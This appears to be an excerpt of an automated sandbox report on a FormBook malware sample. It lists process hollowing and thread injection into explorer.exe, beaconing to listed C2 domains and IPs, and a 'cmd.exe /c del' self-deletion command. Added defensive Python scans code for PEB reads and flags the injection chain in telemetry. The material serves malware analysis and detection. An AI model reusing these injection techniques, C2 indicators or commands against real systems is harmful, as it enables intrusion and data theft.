          Source: explorer.exe, 00000005.00000000.379240198.00000000045BE000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.359510454.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.355349933.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.359378220.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.359549772.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.354289488.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe Code function: 0_2_00403DDB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03672073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
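The "reads the PEB" hits above are all the same 32-bit instruction, a load of the PEB pointer from fs:[0x30], which unpacked FormBook code uses to reach PEB.BeingDebugged and the loader list (PEB.Ldr) without importing any API. The scanner below is an added example of how such a signature is produced from raw code bytes; it is not part of the report or of any Joe Sandbox tooling. The byte blob SAMPLE_CODE is constructed for illustration, and the base address 0x035C3D34 is borrowed from the report's function identifier only to make the output look like the rows above.

```python
"""Scan 32-bit x86 code for reads of the PEB pointer at fs:[0x30], the
instruction pattern behind the report's "Contains functionality to read the
PEB" hits. Added example; SAMPLE_CODE below is a constructed blob, not bytes
taken from the analysed sample."""
import re
from collections import Counter

# Encodings of `mov r32, dword ptr fs:[0x30]`:
#   64 A1 30 00 00 00          mov eax, fs:[0x30]   (short moffs32 form, eax only)
#   64 8B <modrm> 30 00 00 00  mov r32, fs:[0x30]   (ModRM with mod=00, rm=101 => disp32)
# The ModRM byte is (reg << 3) | 5, so the destination register is (modrm >> 3) & 7.
_PEB_READ = re.compile(
    rb"\x64(?:\xA1\x30\x00\x00\x00"
    rb"|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x35\x3D\x2D])\x30\x00\x00\x00)"
)
_REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def find_peb_reads(code: bytes, base: int = 0) -> list[tuple[int, str]]:
    """Return (virtual address, destination register) for each fs:[0x30] read.

    Only the 32-bit PEB pointer is matched: fs:[0x18] (the TEB self pointer)
    and the 64-bit form gs:[0x60] are deliberately not reported.
    """
    hits = []
    for m in _PEB_READ.finditer(code):
        modrm = m.group("modrm")
        reg = "eax" if modrm is None else _REG32[(modrm[0] >> 3) & 7]
        hits.append((base + m.start(), reg))
    return hits


def reads_per_function(hits, function_starts):
    """Attribute each hit to the nearest preceding function start, giving the
    per-function counts the report prints (one row per read, same function id)."""
    starts = sorted(function_starts)
    counts = Counter()
    for addr, _reg in hits:
        owner = max((s for s in starts if s <= addr), default=None)
        if owner is not None:
            counts[owner] += 1
    return dict(counts)


# Constructed 32-bit stub: read the PEB, test PEB.BeingDebugged, then read the
# PEB again into ecx and follow PEB.Ldr (offset 0x0C).
SAMPLE_CODE = bytes.fromhex(
    "64A130000000"    # mov   eax, fs:[0x30]
    "0FB64002"        # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    "85C0"            # test  eax, eax
    "750A"            # jnz   +10 (skip to ret)
    "648B0D30000000"  # mov   ecx, fs:[0x30]
    "8B490C"          # mov   ecx, [ecx+0x0C]         ; PEB.Ldr
    "C3"              # ret
)
# Illustrative base address only; reused from the report's function id 7_2_035C3D34.
SAMPLE_BASE = 0x035C3D34

if __name__ == "__main__":
    hits = find_peb_reads(SAMPLE_CODE, SAMPLE_BASE)
    for addr, reg in hits:
        print(f"{addr:08X}  mov {reg}, dword ptr fs:[00000030h]")
    print(reads_per_function(hits, [SAMPLE_BASE]))
```

Two caveats when using a pattern like this for triage: the fs:[0x30] form is meaningful only in 32-bit code (all the hits above are in the WOW64 ipconfig.exe), and a raw byte scan can fire on data that merely looks like the instruction, so the report's per-function attribution, which walks disassembled functions, is the stronger signal.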

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exe | Network Connect: 62.149.128.40 80
          Source: C:\Windows\explorer.exe | Domain query: www.oikoschain.com
          Source: C:\Windows\explorer.exe | Domain query: www.aizaibali.com
          Source: C:\Windows\explorer.exe | Domain query: www.xn--vuq722jwngjre.com
          Source: C:\Windows\explorer.exe | Domain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exe | Network Connect: 119.59.120.26 80
          Source: C:\Windows\explorer.exe | Domain query: www.doityourselfism.com
          Source: C:\Windows\explorer.exe | Domain query: www.findfoodshop.com
          Source: C:\Windows\explorer.exe | Domain query: www.invisiongc.net
          Source: C:\Windows\explorer.exe | Network Connect: 162.241.62.54 80
          Source: C:\Windows\explorer.exe | Network Connect: 169.62.77.158 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 103.138.88.11 80
          Source: C:\Windows\explorer.exe | Domain query: www.jorgeporcayo.com
          Source: C:\Windows\explorer.exe | Network Connect: 154.88.31.204 80
          Source: C:\Windows\explorer.exe | Domain query: www.scuolatua.com
          Source: C:\Windows\explorer.exe | Domain query: www.okinawarongnho.com
          Source: C:\Windows\explorer.exe | Domain query: www.ecofingers.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Users\user\Desktop\v8kZUFgdD4.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 13E0000
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
          Source: explorer.exe, 00000005.00000000.379766787.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 0_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA,
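Taken together, the rows in this section describe one chain that is easy to write a host-side detection for: the sample injects into explorer.exe (APC queued, thread context set on process 3440), the injected explorer.exe resolves the C2 domains and connects to them on port 80, explorer.exe spawns ipconfig.exe, which in turn runs `cmd.exe /c del` on the original binary. The following is an added example of that detection logic run over constructed, Sysmon-shaped event records; it is not the report's own format or tooling, and the field names, the pid values other than 3440, and the FORMBOOK_URI shape (derived from the `/dy8g/?i0GDM=...&0X=...` URLs this report lists) are assumptions.

```python
"""Flag, in process/network telemetry, the chain this report attributes to the
sample: a Windows system process (explorer.exe) beaconing over HTTP, ipconfig.exe
spawned under explorer.exe, cmd.exe /c del removing the original binary, and
C2 URLs shaped like the ones in this report. Added example; EVENTS is constructed
in a Sysmon-like shape and the field names are assumptions, not the report's
export format."""
import re

# Heuristic shape of the C2 URLs listed in this report:
#   http://<host>/<short path>/?<key>=<long base64 blob>&<key>=<short token>
FORMBOOK_URI = re.compile(
    r"^https?://[^/]+/[a-z0-9]{2,6}/\?[A-Za-z0-9]{2,8}=[A-Za-z0-9+/]{40,}={0,2}"
    r"&[A-Za-z0-9]{1,8}=[A-Za-z0-9]{4,12}$"
)
# System processes that should not be originating HTTP beacons themselves.
SYSTEM_IMAGES = {r"c:\windows\explorer.exe"}


def is_formbook_uri(url: str) -> bool:
    return FORMBOOK_URI.match(url) is not None


def detect(events):
    """Return (rule, pid, detail) tuples for every event that matches a rule."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] == "network":
            if e["image"].lower() in SYSTEM_IMAGES:
                findings.append(("explorer_network", e["pid"], f'{e["dst_ip"]}:{e["dst_port"]}'))
        elif e["type"] == "http":
            if is_formbook_uri(e["url"]):
                findings.append(("formbook_uri", e["pid"], e["url"]))
        elif e["type"] == "process":
            image = e["image"].lower()
            parent = procs.get(e["ppid"])
            parent_image = parent["image"].lower() if parent else ""
            # ipconfig.exe directly under explorer.exe, with no console shell in between
            if image.endswith(r"\ipconfig.exe") and parent_image.endswith(r"\explorer.exe"):
                findings.append(("ipconfig_from_explorer", e["pid"], e["cmdline"]))
            # cmd.exe /c del <file> launched by something other than a shell or explorer
            if (image.endswith(r"\cmd.exe")
                    and re.search(r"/c\s+del\s", e["cmdline"], re.IGNORECASE)
                    and parent is not None
                    and not parent_image.endswith((r"\cmd.exe", r"\explorer.exe"))):
                findings.append(("self_delete", e["pid"], e["cmdline"]))
    return findings


def chain_detected(findings) -> bool:
    """True when all three host-side stages seen in the report occur together."""
    rules = {f[0] for f in findings}
    return {"explorer_network", "ipconfig_from_explorer", "self_delete"} <= rules


# Constructed events modelled on the report's process tree and network activity
# (pid 3440 is the injection target the report names; the other pids are made up).
EVENTS = [
    {"type": "process", "pid": 3440, "ppid": 600, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 4000, "ppid": 3440, "image": r"C:\Windows\SysWOW64\ipconfig.exe", "cmdline": "ipconfig.exe"},
    {"type": "process", "pid": 4100, "ppid": 4000, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'"},
    {"type": "network", "pid": 3440, "image": r"C:\Windows\explorer.exe", "dst_ip": "162.241.62.54", "dst_port": 80},
    {"type": "network", "pid": 3440, "image": r"C:\Windows\explorer.exe", "dst_ip": "169.62.77.158", "dst_port": 80},
    {"type": "http", "pid": 3440, "url": "http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx"},
    {"type": "http", "pid": 5000, "url": "http://www.example.com/index.html"},  # benign control
]

if __name__ == "__main__":
    found = detect(EVENTS)
    for rule, pid, detail in found:
        print(f"{rule:24} pid={pid} {detail}")
    print("chain detected:", chain_detected(found))
```

Each rule on its own is noisy: explorer.exe does talk to the network for legitimate reasons, installers run `cmd /c del` on their own temp files, and a short-path-plus-long-query URL is not unique to this family. The value is in requiring the stages together, which is what chain_detected does, and in then pivoting to the memory evidence the report also gives (RWX sections mapped into explorer.exe and ipconfig.exe, the section unmapped at base 13E0000).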

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Techniques per tactic, as listed in the report's matrix. A number after a technique is the badge the matrix attaches to it (its signature-hit counter); techniques without a number carry no hits in this matrix.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Native API 1; Shared Modules 1; At (Linux); At (Windows); Cron; Launchd
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
